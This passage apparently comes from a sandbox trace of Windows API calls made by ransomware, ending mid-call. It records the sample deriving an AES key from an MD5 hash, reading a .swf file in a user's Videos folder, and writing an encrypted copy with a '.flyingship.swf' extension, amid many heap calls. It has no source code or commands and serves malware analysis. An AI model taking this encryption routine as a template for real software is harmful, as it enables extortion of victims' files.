dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0197.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0197.481] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0197.481] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0197.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0197.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0197.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0197.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0197.482] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0197.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0197.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0197.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1970 [0197.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0197.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0197.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0197.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0197.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0197.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0197.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0197.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0197.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0197.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0197.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0197.482] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0197.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0197.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0197.483] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0197.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0197.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0197.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0197.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0197.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0197.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0197.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0197.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0197.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0197.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0197.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0197.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0197.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0197.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0197.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0197.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0197.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0197.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0197.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0197.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0197.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0197.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0197.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0197.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0197.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0197.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0197.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0197.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0197.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0197.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0197.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0197.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0197.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0197.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0197.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0197.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0197.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0197.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0197.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0197.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0197.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0197.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0197.485] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0197.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0197.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0197.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0197.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0197.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0197.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0197.487] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0197.487] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0197.487] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0197.487] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0197.487] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.487] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0197.487] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.487] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0197.487] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0197.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0197.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0197.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0197.488] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0197.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0197.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0197.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0197.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0197.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0197.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0197.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0197.488] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0197.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0197.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0197.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0197.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0197.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0197.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0197.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0197.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0197.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0197.488] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.489] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0197.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0197.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0197.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0197.489] CryptHashData (hHash=0x90af58, pbData=0x8df000, dwDataLen=0x19, dwFlags=0x1) returned 1 [0197.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0197.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0197.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0197.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0197.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0197.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0197.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0197.489] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.490] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0197.490] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0197.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0197.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0197.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0197.490] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0197.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0197.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0197.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0197.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0197.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0197.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0197.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0197.490] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.491] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0197.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0197.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0197.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0197.491] CryptDestroyHash (hHash=0x90af58) returned 1 [0197.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0197.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0197.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0197.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0197.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0197.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0197.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0197.492] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\op gi7lihe dqiho\\93qz.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0197.492] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.492] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0197.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0197.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0197.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0197.492] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0197.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0197.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0197.493] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.493] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0197.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0197.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0197.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0197.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0197.493] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.flyingship.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\op gi7lihe dqiho\\93qz.flyingship.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0197.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0197.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0197.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0197.494] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0197.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0197.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0197.495] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.496] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0197.496] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0197.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0197.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0197.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0197.496] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0197.496] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0197.500] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x443f, lpOverlapped=0x0) returned 1 [0197.501] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0197.504] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0197.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0197.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0197.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0197.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0197.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1443f) returned 0xbea018 [0197.504] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0197.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0197.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0197.505] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0197.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0197.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0197.505] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0197.505] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0197.505] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0197.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0197.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0197.505] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 